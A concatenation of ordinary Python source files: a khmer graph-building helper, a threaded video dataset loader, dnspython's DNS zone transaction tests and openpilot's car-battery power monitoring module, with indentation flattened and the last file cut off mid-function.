if alpha_iter % 4 == 0:
pg.QtGui.QApplication.processEvents()
# uncomment if you want to see some cooldown
if iter_freq == len(mv_setpoints):
break
print('total iter time = ' + str(time.time() - start_alpha))
return T_array, cum_time, start_alpha, time_array, mass_signals
|
functions.py
|
#
# This file is part of khmer, http://github.com/ged-lab/khmer/, and is
# Copyright (C) Michigan State University, 2009-2015. It is licensed under
# the three-clause BSD license; see doc/LICENSE.txt.
# Contact: khmer-project@idyll.org
#
# pylint: disable=missing-docstring
import threading
import khmer.utils
def build_graph(ifilenames, graph, num_threads=1, tags=False):
if tags:
eat = graph.consume_fasta_and_tag_with_reads_parser
else:
eat = graph.consume_fasta_with_reads_parser
for _, ifile in enumerate(ifilenames):
rparser = khmer.ReadParser(ifile)
threads = []
for _ in range(num_threads):
cur_thread = threading.Thread(target=eat, args=(rparser,))
threads.append(cur_thread)
cur_thread.start()
for thread in threads:
thread.join()
|
data.py
|
import os
import cv2
import random
import tempfile
import numpy as np
from Queue import Queue
from threading import Thread
from .base_provider import VideosDataset, DataProvider
class Data(VideosDataset):
def __init__(self, name, paths, normalization, sequence_length,
crop_size, num_classes, queue_size):
"""
Args:
name: str, name of the data (train, test or validation)
paths: list, list of string that have the video path and label
information
sequence_length: video clip length
crop_size: `tuple`, image resize size (width, height)
normalization: `str` or None
None: no any normalization
divide_255: divide all pixels by 255
divide_256: divide all pixels by 256
num_classes: `integer`, number of classes that the dataset has
queue_size: `integer`, data queue size
"""
self.name = name
self.paths = paths
self.normalization = normalization
self.sequence_length = sequence_length
self.crop_size = crop_size
self.num_classes = num_classes
self.queue = DataQueue(name, queue_size)
self.examples = None
self._start_data_thread()
def get_frames_data(self, filename, num_frames_per_clip=16):
''' Given a directory containing extracted frames, return a video clip of
(num_frames_per_clip) consecutive frames as a list of np arrays
Args
num_frames_per_clip: sequence_length of the video clip
Returns
video: numpy, video clip with shape
[sequence_length, width, height, channels]
'''
video = []
s_index = 0
for parent, dirnames, filenames in os.walk(filename):
if(len(filenames) < num_frames_per_clip):
return None
suffix = filenames[0].split('.', 1)[1]
filenames_int = [int(i.split('.', 1)[0]) for i in filenames]
filenames_int = sorted(filenames_int)
s_index = random.randint(0, len(filenames) - num_frames_per_clip)
for i in range(s_index, s_index + num_frames_per_clip):
image_name = str(filename) + '/' + str(filenames_int[i]) + '.' + suffix
# print image_name
img = cv2.imread(image_name)
img = cv2.resize(img, self.crop_size)
if self.normalization:
img_data = self.normalize_image(img, self.normalization)
video.append(img_data)
return video
def extract_video_data(self):
''' Single tread to extract video and label information from the dataset
'''
# Generate one randome index and
while True:
index = random.randint(0, len(self.paths)-1)
video_path, label = self.paths[index].strip('\n').split()
video = self.get_frames_data(video_path, self.sequence_length)
if video is not None and len(video) == self.sequence_length:
# Put the video into the queue
video = np.array(video)
label = np.array(int(label))
self.queue.put((video, label))
def _start_data_thread(self):
print("Start thread: %s data preparation ..." % self.name)
self.worker = Thread(target=self.extract_video_data)
self.worker.setDaemon(True)
self.worker.start()
@property
def num_examples(self):
if not self.examples:
# calculate the number of examples
total = 0
for line in self.paths:
video_path, _ = line.strip('\n').split()
for root, dirs, files in os.walk(video_path):
total += len(files)
self.examples = total / self.sequence_length
return self.examples
def next_batch(self, batch_size):
''' Get the next batches of the dataset
Args
batch_size: video batch size
Returns
videos: numpy, shape
[batch_size, sequence_length, width, height, channels]
labels: numpy
[batch_size, num_classes]
'''
videos, labels = self.queue.get(batch_size)
videos = np.array(videos)
labels = np.array(labels)
labels = self.labels_to_one_hot(labels, self.num_classes)
return videos, labels
class DataQueue():
def __init__(self, name, maximum_item, block=True):
"""
Args
name: str, data type name (train, validation or test)
maximum_item: integer, maximum item that this queue can store
block: boolean, block the put or get information if the queue is
full or empty
"""
self.name = name
self.block = block
self.maximum_item = maximum_item
self.queue = Queue(maximum_item)
@property
def queue(self):
return self.queue
@property
def name(self):
return self.name
def put(self, data):
self.queue.put(data, self.block)
def get(self, batch_size):
'''
Args:
batch_size: integer, the number of the item you want to get from the queue
Returns:
videos: list, list of numpy data with shape
[sequence_length, width, height, channels]
labels: list, list of integer number
'''
videos = []
labels = []
for i in range(batch_size):
video, label = self.queue.get(self.block)
videos.append(video)
labels.append(label)
return videos, labels
class DataProvider(DataProvider):
def __init__(self, num_classes, validation_set=None, test=False,
validation_split=None, normalization=None, crop_size=(64,64),
sequence_length=16, train_queue=None, valid_queue=None,
test_queue=None, train=False, queue_size=300, **kwargs):
"""
Args:
num_classes: the number of the classes
validation_set: `bool`.
validation_split: `int` or None
float: chunk of `train set` will be marked as `validation set`.
None: if 'validation set' == True, `validation set` will be
copy of `test set`
normalization: `str` or None
None: no any normalization
divide_255: divide all pixels by 255
divide_256: divide all pixels by 256
sequence_length: `integer`, video clip length
crop_size: `tuple`, the size that you want to reshape the images, (width, height)
train: `boolean`, whether we need the training queue or not
test: `test`, whether we need the testing queue or not
queue_size: `integer`, data queue size , default is 300
"""
self._num_classes = num_classes
self._sequence_length = sequence_length
self._crop_size = crop_size
train_videos_labels = self.get_videos_labels_lines(
'data_providers/train.list')
test_videos_labels = self.get_videos_labels_lines(
'data_providers/test.list')
if validation_set and validation_split:
random.shuffle(train_videos_labels)
valid_videos_labels = train_videos_labels[:validation_split]
train_videos_labels = train_videos_labels[validation_split:]
self.validation = Data('validation', valid_videos_labels,
normalization, sequence_length,
crop_size, num_classes, queue_size)
if train:
self.train = Data('train', train_videos_labels,
normalization, sequence_length,
crop_size, num_classes, queue_size)
if test:
self.test = Data('test', test_videos_labels,
normalization, sequence_length,
crop_size, num_classes, queue_size)
if validation_set and not validation_split:
self.validation = Data('validation', test_videos_labels,
normalization, sequence_length,
crop_size, num_classes, queue_size)
def get_videos_labels_lines(self, path):
# Open the file according to the filename
lines = open(path, 'r')
lines = list(lines)
return lines
@property
def data_shape(self):
return (self._sequence_length, self._crop_size[1], self._crop_size[0], 3)
@property
def n_classes(self):
return self._num_classes
|
test_transaction.py
|
# Copyright (C) Dnspython Contributors, see LICENSE for text of ISC license
import time
import pytest
import dns.name
import dns.rdataclass
import dns.rdatatype
import dns.rdataset
import dns.rrset
import dns.transaction
import dns.versioned
import dns.zone
class DB(dns.transaction.TransactionManager):
def __init__(self):
self.rdatasets = {}
def reader(self):
return Transaction(self, False, True)
def writer(self, replacement=False):
return Transaction(self, replacement, False)
def origin_information(self):
return (dns.name.from_text('example'), True, dns.name.empty)
def get_class(self):
return dns.rdataclass.IN
class Transaction(dns.transaction.Transaction):
def __init__(self, db, replacement, read_only):
super().__init__(db, replacement, read_only)
self.rdatasets = {}
if not replacement:
self.rdatasets.update(db.rdatasets)
@property
def db(self):
return self.manager
def _get_rdataset(self, name, rdtype, covers):
return self.rdatasets.get((name, rdtype, covers))
def _put_rdataset(self, name, rdataset):
self.rdatasets[(name, rdataset.rdtype, rdataset.covers)] = rdataset
def _delete_name(self, name):
remove = []
for key in self.rdatasets.keys():
if key[0] == name:
remove.append(key)
if len(remove) > 0:
for key in remove:
del self.rdatasets[key]
def _delete_rdataset(self, name, rdtype, covers):
del self.rdatasets[(name, rdtype, covers)]
def _name_exists(self, name):
for key in self.rdatasets.keys():
if key[0] == name:
return True
return False
def _changed(self):
if self.read_only:
return False
else:
return len(self.rdatasets) > 0
def _end_transaction(self, commit):
if commit:
self.db.rdatasets = self.rdatasets
def _set_origin(self, origin):
pass
@pytest.fixture
def db():
db = DB()
rrset = dns.rrset.from_text('content', 300, 'in', 'txt', 'content')
db.rdatasets[(rrset.name, rrset.rdtype, 0)] = rrset
return db
def test_basic(db):
# successful txn
with db.writer() as txn:
rrset = dns.rrset.from_text('foo', 300, 'in', 'a',
'10.0.0.1', '10.0.0.2')
txn.add(rrset)
assert txn.name_exists(rrset.name)
assert db.rdatasets[(rrset.name, rrset.rdtype, 0)] == \
rrset
# rollback
with pytest.raises(Exception):
with db.writer() as txn:
rrset2 = dns.rrset.from_text('foo', 300, 'in', 'a',
'10.0.0.3', '10.0.0.4')
txn.add(rrset2)
raise Exception()
assert db.rdatasets[(rrset.name, rrset.rdtype, 0)] == \
rrset
with db.writer() as txn:
txn.delete(rrset.name)
assert db.rdatasets.get((rrset.name, rrset.rdtype, 0)) \
is None
def test_get(db):
with db.writer() as txn:
content = dns.name.from_text('content', None)
rdataset = txn.get(content, dns.rdatatype.TXT)
assert rdataset is not None
assert rdataset[0].strings == (b'content',)
assert isinstance(rdataset, dns.rdataset.ImmutableRdataset)
def test_add(db):
with db.writer() as txn:
rrset = dns.rrset.from_text('foo', 300, 'in', 'a',
'10.0.0.1', '10.0.0.2')
txn.add(rrset)
rrset2 = dns.rrset.from_text('foo', 300, 'in', 'a',
'10.0.0.3', '10.0.0.4')
txn.add(rrset2)
expected = dns.rrset.from_text('foo', 300, 'in', 'a',
'10.0.0.1', '10.0.0.2',
'10.0.0.3', '10.0.0.4')
assert db.rdatasets[(rrset.name, rrset.rdtype, 0)] == \
expected
def test_replacement(db):
with db.writer() as txn:
rrset = dns.rrset.from_text('foo', 300, 'in', 'a',
'10.0.0.1', '10.0.0.2')
txn.add(rrset)
rrset2 = dns.rrset.from_text('foo', 300, 'in', 'a',
'10.0.0.3', '10.0.0.4')
txn.replace(rrset2)
assert db.rdatasets[(rrset.name, rrset.rdtype, 0)] == \
rrset2
def test_delete(db):
with db.writer() as txn:
txn.delete(dns.name.from_text('nonexistent', None))
content = dns.name.from_text('content', None)
content2 = dns.name.from_text('content2', None)
txn.delete(content)
assert not txn.name_exists(content)
txn.delete(content2, dns.rdatatype.TXT)
rrset = dns.rrset.from_text('content', 300, 'in', 'txt', 'new-content')
txn.add(rrset)
assert txn.name_exists(content)
txn.delete(content, dns.rdatatype.TXT)
assert not txn.name_exists(content)
rrset = dns.rrset.from_text('content2', 300, 'in', 'txt', 'new-content')
txn.delete(rrset)
content_keys = [k for k in db.rdatasets if k[0] == content]
assert len(content_keys) == 0
def test_delete_exact(db):
with db.writer() as txn:
rrset = dns.rrset.from_text('content', 300, 'in', 'txt', 'bad-content')
with pytest.raises(dns.transaction.DeleteNotExact):
txn.delete_exact(rrset)
rrset = dns.rrset.from_text('content2', 300, 'in', 'txt', 'bad-content')
with pytest.raises(dns.transaction.DeleteNotExact):
txn.delete_exact(rrset)
with pytest.raises(dns.transaction.DeleteNotExact):
txn.delete_exact(rrset.name)
with pytest.raises(dns.transaction.DeleteNotExact):
txn.delete_exact(rrset.name, dns.rdatatype.TXT)
rrset = dns.rrset.from_text('content', 300, 'in', 'txt', 'content')
txn.delete_exact(rrset)
assert db.rdatasets.get((rrset.name, rrset.rdtype, 0)) \
is None
def test_parameter_forms(db):
with db.writer() as txn:
foo = dns.name.from_text('foo', None)
rdataset = dns.rdataset.from_text('in', 'a', 300,
'10.0.0.1', '10.0.0.2')
rdata1 = dns.rdata.from_text('in', 'a', '10.0.0.3')
rdata2 = dns.rdata.from_text('in', 'a', '10.0.0.4')
txn.add(foo, rdataset)
txn.add(foo, 100, rdata1)
txn.add(foo, 30, rdata2)
expected = dns.rrset.from_text('foo', 30, 'in', 'a',
'10.0.0.1', '10.0.0.2',
'10.0.0.3', '10.0.0.4')
assert db.rdatasets[(foo, rdataset.rdtype, 0)] == \
expected
with db.writer() as txn:
txn.delete(foo, rdataset)
txn.delete(foo, rdata1)
txn.delete(foo, rdata2)
assert db.rdatasets.get((foo, rdataset.rdtype, 0)) \
is None
def test_bad_parameters(db):
with db.writer() as txn:
with pytest.raises(TypeError):
txn.add(1)
with pytest.raises(TypeError):
rrset = dns.rrset.from_text('bar', 300, 'in', 'txt', 'bar')
txn.add(rrset, 1)
with pytest.raises(ValueError):
foo = dns.name.from_text('foo', None)
rdata = dns.rdata.from_text('in', 'a', '10.0.0.3')
txn.add(foo, 0x100000000, rdata)
with pytest.raises(TypeError):
txn.add(foo)
with pytest.raises(TypeError):
txn.add()
with pytest.raises(TypeError):
txn.add(foo, 300)
with pytest.raises(TypeError):
txn.add(foo, 300, 'hi')
with pytest.raises(TypeError):
txn.add(foo, 'hi')
with pytest.raises(TypeError):
txn.delete()
with pytest.raises(TypeError):
txn.delete(1)
def test_cannot_store_non_origin_soa(db):
with pytest.raises(ValueError):
with db.writer() as txn:
rrset = dns.rrset.from_text('foo', 300, 'in', 'SOA',
'. . 1 2 3 4 5')
txn.add(rrset)
example_text = """$TTL 3600
$ORIGIN example.
@ soa foo bar 1 2 3 4 5
@ ns ns1
@ ns ns2
ns1 a 10.0.0.1
ns2 a 10.0.0.2
$TTL 300
$ORIGIN foo.example.
bar mx 0 blaz
"""
example_text_output = """@ 3600 IN SOA foo bar 1 2 3 4 5
@ 3600 IN NS ns1
@ 3600 IN NS ns2
@ 3600 IN NS ns3
ns1 3600 IN A 10.0.0.1
ns2 3600 IN A 10.0.0.2
ns3 3600 IN A 10.0.0.3
"""
@pytest.fixture(params=[dns.zone.Zone, dns.versioned.Zone])
def zone(request):
return dns.zone.from_text(example_text, zone_factory=request.param)
def test_zone_basic(zone):
with zone.writer() as txn:
txn.delete(dns.name.from_text('bar.foo', None))
rd = dns.rdata.from_text('in', 'ns', 'ns3')
txn.add(dns.name.empty, 3600, rd)
rd = dns.rdata.from_text('in', 'a', '10.0.0.3')
txn.add(dns.name.from_text('ns3', None), 3600, rd)
output = zone.to_text()
assert output == example_text_output
def test_explicit_rollback_and_commit(zone):
with zone.writer() as txn:
assert not txn.changed()
txn.delete(dns.name.from_text('bar.foo', None))
txn.rollback()
assert zone.get_node('bar.foo') is not None
with zone.writer() as txn:
assert not txn.changed()
txn.delete(dns.name.from_text('bar.foo', None))
txn.commit()
assert zone.get_node('bar.foo') is None
with pytest.raises(dns.transaction.AlreadyEnded):
with zone.writer() as txn:
txn.rollback()
txn.delete(dns.name.from_text('bar.foo', None))
with pytest.raises(dns.transaction.AlreadyEnded):
with zone.writer() as txn:
txn.rollback()
txn.add('bar.foo', 300, dns.rdata.from_text('in', 'txt', 'hi'))
with pytest.raises(dns.transaction.AlreadyEnded):
with zone.writer() as txn:
txn.rollback()
txn.replace('bar.foo', 300, dns.rdata.from_text('in', 'txt', 'hi'))
with pytest.raises(dns.transaction.AlreadyEnded):
with zone.reader() as txn:
txn.rollback()
txn.get('bar.foo', 'in', 'mx')
with pytest.raises(dns.transaction.AlreadyEnded):
with zone.writer() as txn:
txn.rollback()
txn.delete_exact('bar.foo')
with pytest.raises(dns.transaction.AlreadyEnded):
with zone.writer() as txn:
txn.rollback()
txn.name_exists('bar.foo')
with pytest.raises(dns.transaction.AlreadyEnded):
with zone.writer() as txn:
txn.rollback()
txn.update_serial()
with pytest.raises(dns.transaction.AlreadyEnded):
with zone.writer() as txn:
txn.rollback()
txn.changed()
with pytest.raises(dns.transaction.AlreadyEnded):
with zone.writer() as txn:
txn.rollback()
txn.rollback()
with pytest.raises(dns.transaction.AlreadyEnded):
with zone.writer() as txn:
txn.rollback()
txn.commit()
with pytest.raises(dns.transaction.AlreadyEnded):
with zone.writer() as txn:
txn.rollback()
for rdataset in txn:
pass
def test_zone_changed(zone):
# Read-only is not changed!
with zone.reader() as txn:
assert not txn.changed()
# delete an existing name
with zone.writer() as txn:
assert not txn.changed()
txn.delete(dns.name.from_text('bar.foo', None))
assert txn.changed()
# delete a nonexistent name
with zone.writer() as txn:
assert not txn.changed()
txn.delete(dns.name.from_text('unknown.bar.foo', None))
assert not txn.changed()
# delete a nonexistent rdataset from an extant node
with zone.writer() as txn:
assert not txn.changed()
txn.delete(dns.name.from_text('bar.foo', None), 'txt')
assert not txn.changed()
# add an rdataset to an extant Node
with zone.writer() as txn:
assert not txn.changed()
txn.add('bar.foo', 300, dns.rdata.from_text('in', 'txt', 'hi'))
assert txn.changed()
# add an rdataset to a nonexistent Node
with zone.writer() as txn:
assert not txn.changed()
txn.add('foo.foo', 300, dns.rdata.from_text('in', 'txt', 'hi'))
assert txn.changed()
def test_zone_base_layer(zone):
with zone.writer() as txn:
# Get a set from the zone layer
rdataset = txn.get(dns.name.empty, dns.rdatatype.NS, dns.rdatatype.NONE)
expected = dns.rdataset.from_text('in', 'ns', 300, 'ns1', 'ns2')
assert rdataset == expected
def test_zone_transaction_layer(zone):
with zone.writer() as txn:
# Make a change
rd = dns.rdata.from_text('in', 'ns', 'ns3')
txn.add(dns.name.empty, 3600, rd)
# Get a set from the transaction layer
expected = dns.rdataset.from_text('in', 'ns', 300, 'ns1', 'ns2', 'ns3')
rdataset = txn.get(dns.name.empty, dns.rdatatype.NS, dns.rdatatype.NONE)
assert rdataset == expected
assert txn.name_exists(dns.name.empty)
ns1 = dns.name.from_text('ns1', None)
assert txn.name_exists(ns1)
ns99 = dns.name.from_text('ns99', None)
assert not txn.name_exists(ns99)
def test_zone_add_and_delete(zone):
with zone.writer() as txn:
a99 = dns.name.from_text('a99', None)
a100 = dns.name.from_text('a100', None)
a101 = dns.name.from_text('a101', None)
rds = dns.rdataset.from_text('in', 'a', 300, '10.0.0.99')
txn.add(a99, rds)
txn.delete(a99, dns.rdatatype.A)
txn.delete(a100, dns.rdatatype.A)
txn.delete(a101)
assert not txn.name_exists(a99)
assert not txn.name_exists(a100)
assert not txn.name_exists(a101)
ns1 = dns.name.from_text('ns1', None)
txn.delete(ns1, dns.rdatatype.A)
assert not txn.name_exists(ns1)
with zone.writer() as txn:
txn.add(a99, rds)
txn.delete(a99)
assert not txn.name_exists(a99)
with zone.writer() as txn:
txn.add(a100, rds)
txn.delete(a99)
assert not txn.name_exists(a99)
assert txn.name_exists(a100)
def test_write_after_rollback(zone):
with pytest.raises(ExpectedException):
with zone.writer() as txn:
a99 = dns.name.from_text('a99', None)
rds = dns.rdataset.from_text('in', 'a', 300, '10.0.0.99')
txn.add(a99, rds)
raise ExpectedException
with zone.writer() as txn:
a99 = dns.name.from_text('a99', None)
rds = dns.rdataset.from_text('in', 'a', 300, '10.99.99.99')
txn.add(a99, rds)
assert zone.get_rdataset('a99', 'a') == rds
def test_zone_get_deleted(zone):
with zone.writer() as txn:
ns1 = dns.name.from_text('ns1', None)
assert txn.get(ns1, dns.rdatatype.A) is not None
txn.delete(ns1)
assert txn.get(ns1, dns.rdatatype.A) is None
ns2 = dns.name.from_text('ns2', None)
txn.delete(ns2, dns.rdatatype.A)
assert txn.get(ns2, dns.rdatatype.A) is None
def test_zone_bad_class(zone):
with zone.writer() as txn:
rds = dns.rdataset.from_text('ch', 'ns', 300, 'ns1', 'ns2')
with pytest.raises(ValueError):
txn.add(dns.name.empty, rds)
with pytest.raises(ValueError):
txn.replace(dns.name.empty, rds)
with pytest.raises(ValueError):
txn.delete(dns.name.empty, rds)
def test_update_serial(zone):
# basic
with zone.writer() as txn:
txn.update_serial()
rdataset = zone.find_rdataset('@', 'soa')
assert rdataset[0].serial == 2
# max
with zone.writer() as txn:
txn.update_serial(0xffffffff, False)
rdataset = zone.find_rdataset('@', 'soa')
assert rdataset[0].serial == 0xffffffff
# wraparound to 1
with zone.writer() as txn:
txn.update_serial()
rdataset = zone.find_rdataset('@', 'soa')
assert rdataset[0].serial == 1
# trying to set to zero sets to 1
with zone.writer() as txn:
txn.update_serial(0, False)
rdataset = zone.find_rdataset('@', 'soa')
assert rdataset[0].serial == 1
with pytest.raises(KeyError):
with zone.writer() as txn:
txn.update_serial(name=dns.name.from_text('unknown', None))
with pytest.raises(ValueError):
with zone.writer() as txn:
txn.update_serial(-1)
with pytest.raises(ValueError):
with zone.writer() as txn:
txn.update_serial(2**31)
class ExpectedException(Exception):
pass
def test_zone_rollback(zone):
a99 = dns.name.from_text('a99.example.')
try:
with zone.writer() as txn:
rds = dns.rdataset.from_text('in', 'a', 300, '10.0.0.99')
txn.add(a99, rds)
assert txn.name_exists(a99)
raise ExpectedException
except ExpectedException:
pass
assert not zone.get_node(a99)
def test_zone_ooz_name(zone):
with zone.writer() as txn:
with pytest.raises(KeyError):
a99 = dns.name.from_text('a99.not-example.')
assert txn.name_exists(a99)
def test_zone_iteration(zone):
expected = {}
for (name, rdataset) in zone.iterate_rdatasets():
expected[(name, rdataset.rdtype, rdataset.covers)] = rdataset
with zone.writer() as txn:
actual = {}
for (name, rdataset) in txn:
actual[(name, rdataset.rdtype, rdataset.covers)] = rdataset
assert actual == expected
def test_iteration_in_replacement_txn(zone):
rds = dns.rdataset.from_text('in', 'a', 300, '1.2.3.4', '5.6.7.8')
expected = {}
expected[(dns.name.empty, rds.rdtype, rds.covers)] = rds
with zone.writer(True) as txn:
txn.replace(dns.name.empty, rds)
actual = {}
for (name, rdataset) in txn:
actual[(name, rdataset.rdtype, rdataset.covers)] = rdataset
assert actual == expected
def test_replacement_commit(zone):
rds = dns.rdataset.from_text('in', 'a', 300, '1.2.3.4', '5.6.7.8')
expected = {}
expected[(dns.name.empty, rds.rdtype, rds.covers)] = rds
with zone.writer(True) as txn:
txn.replace(dns.name.empty, rds)
with zone.reader() as txn:
actual = {}
for (name, rdataset) in txn:
actual[(name, rdataset.rdtype, rdataset.covers)] = rdataset
assert actual == expected
def test_replacement_get(zone):
with zone.writer(True) as txn:
rds = txn.get(dns.name.empty, 'soa')
assert rds is None
@pytest.fixture
def vzone():
return dns.zone.from_text(example_text, zone_factory=dns.versioned.Zone)
def test_vzone_read_only(vzone):
with vzone.reader() as txn:
rdataset = txn.get(dns.name.empty, dns.rdatatype.NS, dns.rdatatype.NONE)
expected = dns.rdataset.from_text('in', 'ns', 300, 'ns1', 'ns2')
assert rdataset == expected
with pytest.raises(dns.transaction.ReadOnly):
txn.replace(dns.name.empty, expected)
def test_vzone_multiple_versions(vzone):
assert len(vzone._versions) == 1
vzone.set_max_versions(None) # unlimited!
with vzone.writer() as txn:
txn.update_serial()
with vzone.writer() as txn:
txn.update_serial()
with vzone.writer() as txn:
txn.update_serial(1000, False)
rdataset = vzone.find_rdataset('@', 'soa')
assert rdataset[0].serial == 1000
assert len(vzone._versions) == 4
with vzone.reader(id=5) as txn:
assert txn.version.id == 5
rdataset = txn.get('@', 'soa')
assert rdataset[0].serial == 1000
with vzone.reader(serial=1000) as txn:
assert txn.version.id == 5
rdataset = txn.get('@', 'soa')
assert rdataset[0].serial == 1000
vzone.set_max_versions(2)
assert len(vzone._versions) == 2
# The ones that survived should be 3 and 1000
rdataset = vzone._versions[0].get_rdataset(dns.name.empty,
dns.rdatatype.SOA,
dns.rdatatype.NONE)
assert rdataset[0].serial == 3
rdataset = vzone._versions[1].get_rdataset(dns.name.empty,
dns.rdatatype.SOA,
dns.rdatatype.NONE)
assert rdataset[0].serial == 1000
with pytest.raises(ValueError):
vzone.set_max_versions(0)
# for debugging if needed
def _dump(zone):
for v in zone._versions:
print('VERSION', v.id)
for (name, n) in v.nodes.items():
for rdataset in n:
print(rdataset.to_text(name))
def test_vzone_open_txn_pins_versions(vzone):
assert len(vzone._versions) == 1
vzone.set_max_versions(None) # unlimited!
with vzone.writer() as txn:
txn.update_serial()
with vzone.writer() as txn:
txn.update_serial()
with vzone.writer() as txn:
txn.update_serial()
with vzone.reader(id=2) as txn:
vzone.set_max_versions(1)
with vzone.reader(id=3) as txn:
rdataset = txn.get('@', 'soa')
assert rdataset[0].serial == 2
assert len(vzone._versions) == 4
assert len(vzone._versions) == 1
rdataset = vzone.find_rdataset('@', 'soa')
assert vzone._versions[0].id == 5
assert rdataset[0].serial == 4
try:
import threading
one_got_lock = threading.Event()
def run_one(zone):
with zone.writer() as txn:
one_got_lock.set()
# wait until two blocks
while len(zone._write_waiters) == 0:
time.sleep(0.01)
rds = dns.rdataset.from_text('in', 'a', 300, '10.0.0.98')
txn.add('a98', rds)
def run_two(zone):
# wait until one has the lock so we know we will block if we
# get the call done before the sleep in one completes
one_got_lock.wait()
with zone.writer() as txn:
rds = dns.rdataset.from_text('in', 'a', 300, '10.0.0.99')
txn.add('a99', rds)
def test_vzone_concurrency(vzone):
t1 = threading.Thread(target=run_one, args=(vzone,))
t1.start()
t2 = threading.Thread(target=run_two, args=(vzone,))
t2.start()
t1.join()
t2.join()
with vzone.reader() as txn:
assert txn.name_exists('a98')
assert txn.name_exists('a99')
except ImportError: # pragma: no cover
pass
|
power_monitoring.py
|
import random
import threading
import time
from statistics import mean
from cereal import log
from common.params import Params, put_nonblocking
from common.realtime import sec_since_boot
from selfdrive.hardware import HARDWARE
from selfdrive.swaglog import cloudlog
CAR_VOLTAGE_LOW_PASS_K = 0.091 # LPF gain for 5s tau (dt/tau / (dt/tau + 1))
# A C2 uses about 1W while idling, and 30h seens like a good shutoff for most cars
# While driving, a battery charges completely in about 30-60 minutes
CAR_BATTERY_CAPACITY_uWh = 30e6
CAR_CHARGING_RATE_W = 45
VBATT_PAUSE_CHARGING = 11.0
MAX_TIME_OFFROAD_S = 8*3600
class PowerMonitoring:
def __init__(self):
self.params = Params()
self.last_measurement_time = None # Used for integration delta
self.last_save_time = 0 # Used for saving current value in a param
self.power_used_uWh = 0 # Integrated power usage in uWh since going into offroad
self.next_pulsed_measurement_time = None
self.car_voltage_mV = 12e3 # Low-passed version of pandaState voltage
self.integration_lock = threading.Lock()
car_battery_capacity_uWh = self.params.get("CarBatteryCapacity")
if car_battery_capacity_uWh is None:
car_battery_capacity_uWh = 0
# Reset capacity if it's low
self.car_battery_capacity_uWh = max((CAR_BATTERY_CAPACITY_uWh / 10), int(car_battery_capacity_uWh))
# Calculation tick
def calculate(self, pandaState):
try:
now = sec_since_boot()
# If pandaState is None, we're probably not in a car, so we don't care
if pandaState is None or pandaState.pandaState.pandaType == log.PandaState.PandaType.unknown:
with self.integration_lock:
self.last_measurement_time = None
self.next_pulsed_measurement_time = None
self.power_used_uWh = 0
return
# Low-pass battery voltage
self.car_voltage_mV = ((pandaState.pandaState.voltage * CAR_VOLTAGE_LOW_PASS_K) + (self.car_voltage_mV * (1 - CAR_VOLTAGE_LOW_PASS_K)))
# Cap the car battery power and save it in a param every 10-ish seconds
self.car_battery_capacity_uWh = max(self.car_battery_capacity_uWh, 0)
self.car_battery_capacity_uWh = min(self.car_battery_capacity_uWh, CAR_BATTERY_CAPACITY_uWh)
if now - self.last_save_time >= 10:
put_nonblocking("CarBatteryCapacity", str(int(self.car_battery_capacity_uWh)))
self.last_save_time = now
# First measurement, set integration time
with self.integration_lock:
if self.last_measurement_time is None:
self.last_measurement_time = now
return
if (pandaState.pandaState.ignitionLine or pandaState.pandaState.ignitionCan):
# If there is ignition, we integrate the charging rate of the car
with self.integration_lock:
self.power_used_uWh = 0
integration_time_h = (now - self.last_measurement_time) / 3600
if integration_time_h < 0:
raise ValueError(f"Negative integration time: {integration_time_h}h")
self.car_battery_capacity_uWh += (CAR_CHARGING_RATE_W * 1e6 * integration_time_h)
self.last_measurement_time = now
else:
# No ignition, we integrate the offroad power used by the device
is_uno = pandaState.pandaState.pandaType == log.PandaState.PandaType.uno
# Get current power draw somehow
current_power = HARDWARE.get_current_power_draw() # pylint: disable=assignment-from-none
if current_power is not None:
pass
elif HARDWARE.get_battery_status() == 'Discharging':
# If the battery is discharging, we can use this measurement
# On C2: this is low by about 10-15%, probably mostly due to UNO draw not being factored in
current_power = ((HARDWARE.get_battery_voltage() / 1000000) * (HARDWARE.get_battery_current() / 1000000))
elif (self.next_pulsed_measurement_time is not None) and (self.next_pulsed_measurement_time <= now):
# TODO: Figure out why this is off by a factor of 3/4???
FUDGE_FACTOR = 1.33
# Turn off charging for about 10 sec in a thread that does not get killed on SIGINT, and perform measurement here to avoid blocking thermal
def perform_pulse_measurement(now):
try:
HARDWARE.set_battery_charging(False)
time.sleep(5)
# Measure for a few sec to get a good average
voltages = []
currents = []
for _ in range(6):
voltages.append(HARDWARE.get_battery_voltage())
currents.append(HARDWARE.get_battery_current())
time.sleep(1)
current_power = ((mean(voltages) / 1000000) * (mean(currents) / 1000000))
self._perform_integration(now, current_power * FUDGE_FACTOR)
# Enable charging again
HARDWARE.set_battery_charging(True)
except Exception:
cloudlog.exception("Pulsed power measurement failed")
# Start pulsed measurement and return
threading.Thread(target=perform_pulse_measurement, args=(now,)).start()
self.next_pulsed_measurement_time = None
return
elif self.next_pulsed_measurement_time is None and not is_uno:
# On a charging EON with black panda, or drawing more than 400mA out of a white/grey one
# Only way to get the power draw is to turn off charging for a few sec and check what the discharging rate is
# We shouldn't do this very often, so make sure it has been some long-ish random time interval
self.next_pulsed_measurement_time = now + random.randint(120, 180)
return
else:
# Do nothing
return
# Do the integration
self._perform_integration(now, current_power)
except Exception:
cloudlog.exception("Power monitoring calculation failed")
def _perform_integration(self, t, current_power):
with self.integration_lock:
try:
if self.last_measurement_time:
integration_time_h = (t - self.last_measurement_time) / 3600
power_used = (current_power * 1000000) * integration_time_h
if power_used < 0:
raise ValueError(f"Negative power used! Integration time: {integration_time_h} h Current Power: {power_used} uWh")
self.power_used_uWh += power_used
self.car_battery_capacity_uWh -= power_used
self.last_measurement_time = t
except Exception:
cloudlog.exception("Integration failed")
# Get the power usage
def get_power_used(self):
return int(self.power_used_uWh)
def get_car_battery_capacity(self):
return int(self.car_battery_capacity_uWh)
# See if we need to disable charging
def should_disable_charging(self, pandaState, offroad_timestamp):
if pandaState is None or offroad_timestamp is None:
return False
now = sec_since_boot()
disable_charging = False
disable_charging |= (now - offroad_timestamp) > MAX_TIME_OFFROAD_S
disable_charging |= (self.car_voltage_mV < (VBATT_PAUSE_CHARGING * 1e3))
disable_charging |= (self.car_battery_capacity_uWh <= 0)
disable_charging &= (not pandaState.pandaState.ignitionLine and not pandaState.pandaState.ignitionCan)
disable_charging &= (not self.params.get_bool("DisablePowerDown"))
disable_charging |= self.params.get_bool("ForcePowerDown")
return disable_charging
# See if we need to shutdown
def should_shutdown(self, pandaState, offroad_timestamp, started_seen):
if pandaState is None or offroad_timestamp is None:
return False
now = sec_since_boot()
